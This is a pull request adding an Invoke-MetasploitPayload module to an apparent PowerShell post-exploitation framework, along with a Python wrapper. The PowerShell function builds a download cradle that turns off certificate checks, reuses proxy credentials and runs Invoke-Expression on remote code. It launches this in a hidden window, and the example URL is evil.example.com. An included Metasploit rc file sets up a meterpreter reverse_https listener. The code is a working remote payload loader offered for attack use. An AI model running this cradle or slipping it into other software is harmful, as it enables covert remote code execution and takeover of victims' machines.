### PR TITLE
adding the invoke-metasploitpayload module

### DIFF
--- a/data/module_source/code_execution/Invoke-MetasploitPayload.ps1
+++ b/data/module_source/code_execution/Invoke-MetasploitPayload.ps1
@@ -1,0 +1,88 @@
+function Invoke-MetasploitPayload 
+{
+<#
+.SYNOPSIS
+Kick off a Metasploit Payload using the exploit/multi/script/web_delivery module
+Author: Jared Haight (@jaredhaight)
+License: MIT
+Required Dependencies: None
+Optional Dependencies: None
+ 
+.DESCRIPTION
+Spawns a new, hidden PowerShell window that downloads and executes a Metasploit payload from a specified URL.
+
+This relies on the exploit/multi/scripts/web_delivery metasploit module. The web_delivery module generates a script for
+a given payload and then fires up a webserver to host said script. If the payload is a reverse shell, it will also handle
+starting up the listener for that payload. 
+
+An example rc file is below (or you can just type the commands manually). It does the following:
+
+* Sets the download cradle to port 8443 (SRVPORT) on all IPs (SRVHOST)
+* Sets the script target to PowerShell (set target 2)
+* Sets the payload being served to windows/meterpreter/reverse_https
+* Sets the payload to listen on port 443 (LPORT) on all IPs (LHOST)
+
+====== Invoke-MetasploitPayload rc file ======
+use exploit/multi/script/web_delivery
+set SRVHOST 0.0.0.0
+set SRVPORT 8443
+set SSL true
+set target 2
+set payload windows/meterpreter/reverse_https
+set LHOST 0.0.0.0
+set LPORT 443
+run -j
+==== end Invoke-MetasploitPayload rc file ====
+
+.PARAMETER url
+This is the URL for the download cradle, by default it will be something 
+like "https://evil.example.com/[Random Chars]"
+
+.EXAMPLE
+PS C:\>Invoke-MetasploitPayload -url https://evil.example.com/2k1isEdsl
+Downloads and executes a Metasploit payload located at https://evil.example.com/2k1isEdsl
+
+
+.NOTES
+You can use the "-verbose" option for verbose output.
+
+.LINK
+Github: https://github.com/jaredhaight/Invoke-MetasploitPayload
+
+#>
+
+[CmdletBinding()]
+Param
+(
+    [Parameter( Mandatory = $True)]
+    [ValidateNotNullOrEmpty()]
+    [string]$url
+)
+
+    Write-Verbose "[*] Creating Download Cradle script using $url"
+    $DownloadCradle ='[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};$client = New-Object Net.WebClient;$client.Proxy=[Net.WebRequest]::GetSystemWebProxy();$client.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;Invoke-Expression $client.downloadstring('''+$url+''');'
+    
+    Write-Verbose "[*] Figuring out if we're starting from a 32bit or 64bit process.."
+    if([IntPtr]::Size -eq 4)
+    {
+        Write-Verbose "[*] Looks like we're 64bit, using regular powershell.exe"
+        $PowershellExe = 'powershell.exe'
+    }
+    else
+    {
+        Write-Verbose "[*] Looks like we're 32bit, using syswow64 powershell.exe"
+        $PowershellExe=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'
+    };
+    
+    Write-Verbose "[*] Creating Process Object.."
+    $ProcessInfo = New-Object System.Diagnostics.ProcessStartInfo
+    $ProcessInfo.FileName=$PowershellExe
+    $ProcessInfo.Arguments="-nop -c $DownloadCradle"
+    $ProcessInfo.UseShellExecute = $False
+    $ProcessInfo.RedirectStandardOutput = $True
+    $ProcessInfo.CreateNoWindow = $True
+    $ProcessInfo.WindowStyle = "Hidden"
+    Write-Verbose "[*] Kicking off download cradle in a new process.."
+    $Process = [System.Diagnostics.Process]::Start($ProcessInfo)
+    Write-Verbose "[*] Done!"
+}

--- a/lib/modules/code_execution/invoke_metasploitpayload.py
+++ b/lib/modules/code_execution/invoke_metasploitpayload.py
@@ -27,7 +27,7 @@ class Module:
                 'Value'         :   ''
             },
             'URL' : {
-                'Description'   :   'URL from the Metasploit web_delievery module',
+                'Description'   :   'URL from the Metasploit web_delivery module',
                 'Required'      :   True,
                 'Value'         :   ''
             }

--- a/lib/modules/code_execution/invoke_metasploitpayload.py
+++ b/lib/modules/code_execution/invoke_metasploitpayload.py
@@ -4,68 +4,38 @@ class Module:
 
     def __init__(self, mainMenu, params=[]):
 
-        # metadata info about the module, not modified during runtime
         self.info = {
-            # name for the module that will appear in module menus
             'Name': 'Invoke-MetasploitPayload',
-
-            # list of one or more authors for the module
             'Author': ['@jaredhaight'],
-
-            # more verbose multi-line description of the module
             'Description': ('Spawns a new, hidden PowerShell window that downloads'
                             'and executes a Metasploit payload. This relies on the' 
                             'exploit/multi/scripts/web_delivery metasploit module.'),
-
-            # True if the module needs to run in the background
             'Background' : False,
-
-            # File extension to save the file as
             'OutputExtension' : None,
-
-            # True if the module needs admin rights to run
             'NeedsAdmin' : False,
-
-            # True if the method doesn't touch disk/is reasonably opsec safe
             'OpsecSafe' : True,
-            
-            # The minimum PowerShell version needed for the module to run
             'MinPSVersion' : '2',
-
-            # list of any references/other comments
             'Comments': [
                 'https://github.com/jaredhaight/Invoke-MetasploitPayload/'
             ]
         }
 
-        # any options needed by the module, settable during runtime
         self.options = {
-            # format:
-            #   value_name : {description, required, default_value}
             'Agent' : {
-                # The 'Agent' option is the only one that MUST be in a module
-                'Description'   :   'Agent to grab a screenshot from.',
+                'Description'   :   'Agent to run Metasploit payload on.',
                 'Required'      :   True,
                 'Value'         :   ''
             },
             'URL' : {
-                'Description'   :   'URL of the hosted Metasploit payload',
+                'Description'   :   'URL from the Metasploit web_delievery module',
                 'Required'      :   True,
                 'Value'         :   ''
             }
         }
-
-        # save off a copy of the mainMenu object to access external functionality
-        #   like listeners/agent handlers/etc.
         self.mainMenu = mainMenu
 
-        # During instantiation, any settable option parameters
-        #   are passed as an object set to the module and the
-        #   options dictionary is automatically set. This is mostly
-        #   in case options are passed on the command line
         if params:
             for param in params:
-                # parameter format is [Name, Value]
                 option, value = param
                 if option in self.options:
                     self.options[option]['Value'] = value
@@ -86,8 +56,6 @@ class Module:
         script = moduleCode
 	script += "\nInvoke-MetasploitPayload"
 
-
-        # add any arguments to the end execution of the script
         for option,values in self.options.iteritems():
             if option.lower() != "agent":
                 if values['Value'] and values['Value'] != '':

--- a/lib/modules/code_execution/invoke_metasploitpayload.py
+++ b/lib/modules/code_execution/invoke_metasploitpayload.py
@@ -1,0 +1,100 @@
+from lib.common import helpers
+
+class Module:
+
+    def __init__(self, mainMenu, params=[]):
+
+        # metadata info about the module, not modified during runtime
+        self.info = {
+            # name for the module that will appear in module menus
+            'Name': 'Invoke-MetasploitPayload',
+
+            # list of one or more authors for the module
+            'Author': ['@jaredhaight'],
+
+            # more verbose multi-line description of the module
+            'Description': ('Spawns a new, hidden PowerShell window that downloads'
+                            'and executes a Metasploit payload. This relies on the' 
+                            'exploit/multi/scripts/web_delivery metasploit module.'),
+
+            # True if the module needs to run in the background
+            'Background' : False,
+
+            # File extension to save the file as
+            'OutputExtension' : None,
+
+            # True if the module needs admin rights to run
+            'NeedsAdmin' : False,
+
+            # True if the method doesn't touch disk/is reasonably opsec safe
+            'OpsecSafe' : True,
+            
+            # The minimum PowerShell version needed for the module to run
+            'MinPSVersion' : '2',
+
+            # list of any references/other comments
+            'Comments': [
+                'https://github.com/jaredhaight/Invoke-MetasploitPayload/'
+            ]
+        }
+
+        # any options needed by the module, settable during runtime
+        self.options = {
+            # format:
+            #   value_name : {description, required, default_value}
+            'Agent' : {
+                # The 'Agent' option is the only one that MUST be in a module
+                'Description'   :   'Agent to grab a screenshot from.',
+                'Required'      :   True,
+                'Value'         :   ''
+            },
+            'URL' : {
+                'Description'   :   'URL of the hosted Metasploit payload',
+                'Required'      :   True,
+                'Value'         :   ''
+            }
+        }
+
+        # save off a copy of the mainMenu object to access external functionality
+        #   like listeners/agent handlers/etc.
+        self.mainMenu = mainMenu
+
+        # During instantiation, any settable option parameters
+        #   are passed as an object set to the module and the
+        #   options dictionary is automatically set. This is mostly
+        #   in case options are passed on the command line
+        if params:
+            for param in params:
+                # parameter format is [Name, Value]
+                option, value = param
+                if option in self.options:
+                    self.options[option]['Value'] = value
+
+
+    def generate(self):
+        
+        moduleSource = self.mainMenu.installPath + "/data/module_source/code_execution/Invoke-MetasploitPayload.ps1"
+        try:
+            f = open(moduleSource, 'r')
+        except:
+            print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
+            return ""
+
+        moduleCode = f.read()
+        f.close()
+
+        script = moduleCode
+	script += "\nInvoke-MetasploitPayload"
+
+
+        # add any arguments to the end execution of the script
+        for option,values in self.options.iteritems():
+            if option.lower() != "agent":
+                if values['Value'] and values['Value'] != '':
+                    if values['Value'].lower() == "true":
+                        # if we're just adding a switch
+                        script += " -" + str(option)
+                    else:
+                        script += " -" + str(option) + " " + str(values['Value'])
+
+        return script


### PR DESCRIPTION
Adding my Invoke-MetasploitPayload module. This lets you execute a wide variety of metasploit payloads easily through powershell, not just reverse listeners.